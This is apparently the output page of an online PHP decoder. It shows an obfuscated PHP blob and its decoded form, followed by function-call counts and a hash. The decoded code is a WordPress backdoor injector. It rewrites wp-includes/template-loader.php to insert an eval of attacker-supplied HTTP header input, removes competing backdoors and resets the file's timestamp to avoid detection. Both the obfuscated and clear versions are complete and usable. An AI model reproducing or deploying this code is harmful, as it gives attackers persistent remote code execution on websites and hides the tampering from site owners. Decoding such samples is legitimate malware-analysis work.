Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSKRqNQFZkkZTtTVpICEP2jyAdJoiMCY4MTYFkwdT//tM..
Decoded Output download
phpConfValidate('YTo0OntpOjA7czo2NDoiL2hvbWUxL2FobWVkL3B1YmxpY19odG1sL3Nha2FyeWEvd3AtaW5jbHVkZXMvdGVtcGxhdGUtbG9hZGVyLnBocCI7aToxO3M6OTg6In5ldmFsW15cKFxuXHJdKlwoW15cJF0qXCRfW0EtWl17Nn1bXlxbXSpcW1teXCdcIl0qW1wnXCJdSFRUUF8wMEVGNzZFW1wnXCJdW15cXV0qXF1bXlwpXSpcKVteO10qO35zIjtpOjI7czozMjoiQGV2YWwoJF9TRVJWRVJbJ0hUVFBfMDBFRjc2RSddKTsiO2k6MztzOjM1OiJ+XlxzKmlmLippc19yb2JvdHNbXlx7fFw6XSsoXHt8Oil+bSI7fQ==');
function phpConfValidate($ser) {
list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));
$source = file_get_contents($fullPath);
if (preg_match($systemEnv, $source)) {
return;
}
if (!preg_match($pattern, $source, $matches)) {
return;
}
$incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv);
$newSource = preg_replace($incorrectRegex, '', $source);
$newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);
if (!preg_match($systemEnv, $newSource)) {
return;
}
$filemtime = filemtime($fullPath) + 10;
unlink($fullPath);
file_put_contents($fullPath, $newSource);
touch($fullPath, $filemtime);
}
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSKRqNQFZkkZTtTVpICEP2jyAdJoiMCY4MTYFkwdT//tM3n1ImyXja3zPuec+ClEQNSnxTQcjz2GwJE7HVDIIi4zFfQ1kVBk8UNRTgpVrTTY9RaWuZS575YY8DTfRVK5TT5OTXnkQOIq6hVZr5ZXvmWNVFm7bXD7b/ZWnmQxom8DTJszV6sGzZm57pEFBs1NzxnRjlPtVYzyvdkgFe6GaWHIFdNVNard1r4vXNL/rqvRiN4e+JbWYheXagMiujTeuPYqAJTNoNz3QwdKLJa+J3dS9kTqcTNTbdb9laoPsWT3+z7lsk3OpOX4d5fiuyaAhSy9GuZJ1FnnenTzvrL+g6Ekzlam1prpaHw9N3eLb1aVgYqoNv//QUIcLoAxHntcdJ8hQltV+xjJj0ZcNpF9zfVk3xGEPRRGQ61tX0Vdee5DrrvnqumqPEmq32a2B8LU76tT8p7s78ep7wU8JYIgS4X1nigmMr4Q/hYLAF0YJE0pFP8X40WHBjVBMtgmDYYusuA2oB/kROYzBmFwJd0JKOBpxqgyWXCeB1W8zD+Zue1oeN2ctJjSNAeT+PsJwNodsBihhkLDkHOvgi3yhFMVwPgsdBoLSm/h7mqtcrXBYMWRpTPbQ1xPBl0uGg9wTnhu7F5j8g2mvHRFA4xgCNoRzuOE5JCyexTDCDuBjDUXhqyCunN2BxRtB/PnDiePd1dmKlwU8FoPA9ehYj53OI9m7UJxLPCf9CfhSyDGlX9LvQ6O4gsf246xl9Lj19vlEcmA9fz4U77L8Z9j/1C1vdchQeGz7zr5ot3AtyNIelhKMyPLDKOyGJUo/G5ZPkmA0zQVfeJyico/Xwl8=")));
Function Calls
gzinflate | 1 |
base64_decode | 1 |
phpConfValidate | 1 |
Stats
MD5 | e7d9ad9f275e1893839187eda0a75206 |
Eval Count | 1 |
Decode Time | 70 ms |